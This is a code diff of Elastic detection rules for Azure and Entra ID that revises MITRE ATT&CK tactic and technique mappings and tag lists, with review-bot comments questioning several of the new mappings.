[[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" 
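Review bot: The `[[rule.threat]]` entry for TA0011 Command and Control with T1071 Application Layer Protocol that the next hunk substitutes for the Initial Access entry has no rationale visible in the rule for an Entra ID Protection sign-in risk event, and the same pair is added to initial_access_entra_id_protection_user_risk_detected. If the mapping reflects specific risk-detection categories the promotion rule forwards, a sentence in the rule `note` naming them would make the mapping reviewable; otherwise it widens the ATT&CK coverage reported for the rule without evidence. The added T1556 Modify Authentication Process entry carries no subtechnique while the neighbouring T1110 does, which may be intended but is worth confirming.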
@@ -130,21 +163,17 @@ reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml index d22b4a05914..e70380965a8 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml @@ -3,7 +3,7 @@ creation_date = "2025/06/02" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] 
@@ -119,21 +119,58 @@ value = "low" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml index 23eb23df53f..da8c29614c4 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/15" [rule] author = ["Elastic"] 
@@ -66,7 +66,17 @@ references = ["https://securityscorecard.com/wp-content/uploads/2025/02/MassiveB risk_score = 47 rule_id = "c766bc56-fdca-11ef-b194-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -113,39 +123,34 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml index d8c10af6a3e..6ec4110788e 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -94,21 +94,52 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml index 7ec92bf9f21..a80ea2d7227 100644 --- a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml +++ b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -74,7 +74,17 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration. """ severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "esql" 
@@ -183,31 +193,40 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml index c41eda20e66..53b7a160471 100644 --- a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml +++ b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/20" [rule] author = ["Elastic"] 
@@ -79,7 +79,15 @@ references = [ risk_score = 21 rule_id = "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "new_terms" @@ -106,39 +114,34 @@ event.dataset: "azure.graphactivitylogs" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = [ 
diff --git a/rules/integrations/azure/ml_azure_event_failures.toml b/rules/integrations/azure/ml_azure_event_failures.toml index e5dcf556327..273f46e76a5 100644 --- a/rules/integrations/azure/ml_azure_event_failures.toml +++ b/rules/integrations/azure/ml_azure_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -79,7 +79,14 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "1eb74889-18c5-4f78-8010-d8aceb7a9ef4" severity = "low" -tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] @@ -90,13 +97,15 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" [[rule.threat]] framework = "MITRE ATT&CK" 
@@ -105,3 +114,11 @@ framework = "MITRE ATT&CK" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index a2eb55186b4..9e1182f57d9 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 
@@ -88,3 +88,61 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/azure/ml_azure_rare_method_by_city.toml b/rules/integrations/azure/ml_azure_rare_method_by_city.toml index f9a6f0637fe..84f94ffc52b 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_city.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 
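Review bot: Five of the six `[[rule.threat]]` entries added here carry only a tactic with no technique, which yields tactic-only ATT&CK coverage spanning Discovery, Privilege Escalation, Defense Evasion, Lateral Movement, Persistence and Collection for one anomaly rule. If the ML job genuinely cannot be tied to techniques, a comment in the rule such as `# Tactic-only mappings: the anomaly job covers failures across many operations, no single technique applies` would document the choice; otherwise narrowing to the tactics the job's detectors actually support would be more defensible. The `tags` array begins outside this hunk, so whether it carries a `Tactic:` tag per entry cannot be confirmed from here.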
@@ -80,12 +80,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ce08cdb8-e6cb-46bb-a7cc-16d17547323f" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -95,8 +107,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_country.toml b/rules/integrations/azure/ml_azure_rare_method_by_country.toml index 82337ac08ee..bbaf6442692 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_country.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 
@@ -79,12 +79,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "76de17b9-af25-49a0-9378-02888b6bb3a2" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -94,8 +106,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_user.toml b/rules/integrations/azure/ml_azure_rare_method_by_user.toml index 2a492ccadcb..2dd9dacbf77 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_user.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 75 
@@ -78,12 +78,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "81892f44-4946-4b27-95d3-1d8929b114a7" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" 
@@ -94,25 +106,42 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index 829a5c592d2..222286c88de 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
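Review bot: The new Exfiltration entry maps this rare-operation anomaly to T1041 Exfiltration Over C2 Channel, and the new Persistence entry has no technique at all, but nothing in the visible rule explains why an unusual Azure operation by a user indicates C2-channel exfiltration; a short justification in the rule description or a tighter technique would make the mapping defensible. The hunk also ends with an added blank line after the last `reference`, leaving a trailing empty line at end of file. The `tags` rewrite in the previous hunk drops `Tactic: Initial Access`, so none of the four tactics now mapped has a tag.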
@@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "df26fd74-1baa-4479-b42e-48da84642330" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,13 +73,26 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/persistence_automation_webhook_created.toml b/rules/integrations/azure/persistence_automation_webhook_created.toml index e92f77af499..8329792a513 100644 --- a/rules/integrations/azure/persistence_automation_webhook_created.toml +++ b/rules/integrations/azure/persistence_automation_webhook_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -79,7 +79,6 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" 
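Review bot: Both `[[rule.threat]]` entries now list T1078 Valid Accounts, so the Defense Evasion entry duplicates the Persistence entry's technique and loses the distinct T1578 Modify Cloud Compute Infrastructure it previously carried. If Defense Evasion is still intended for automation-account creation, a technique specific to that tactic should be kept; if not, dropping the second entry would also match the new tags line, which carries only `Tactic: Persistence`.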
@@ -89,3 +88,15 @@ reference = "https://attack.mitre.org/techniques/T1546/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1608"
+name = "Stage Capabilities"
+reference = "https://attack.mitre.org/techniques/T1608/"
+
+[rule.threat.tactic]
+id = "TA0042"
+name = "Resource Development"
+reference = "https://attack.mitre.org/tactics/TA0042/"
diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml
index 91602b230ea..a89c1fcdf5d 100644
--- a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml
+++ b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -70,7 +70,16 @@ references = [
 risk_score = 47
 rule_id = "bc48bba7-4a23-4232-b551-eca3ca1e3f20"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Use Case: Configuration Audit",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -83,7 +92,6 @@ event.dataset: "azure.auditlogs"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
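Review bot: The added `[[rule.threat]]` maps `T1608` Stage Capabilities under `TA0042` Resource Development, but this patch leaves the webhook rule's `tags` line untouched, so unless it already carries `Tactic: Resource Development` the tags and the threat mapping will disagree. Resource Development covers infrastructure an adversary prepares outside the victim environment, whereas this rule fires on a webhook created inside the tenant; the existing `T1546` Event Triggered Execution entry under Persistence already describes that, so dropping the new entry looks safer than tagging it. If it stays, the layout (`framework` immediately followed by `[[rule.threat.technique]]`, no blank line) differs from the entry above it.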
@@ -94,28 +102,12 @@ id = "T1556.009"
 name = "Conditional Access Policies"
 reference = "https://attack.mitre.org/techniques/T1556/009/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1556.009"
-name = "Conditional Access Policies"
-reference = "https://attack.mitre.org/techniques/T1556/009/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"]
diff --git a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml
index 2c0d8ed1c85..94d21dfa04f 100644
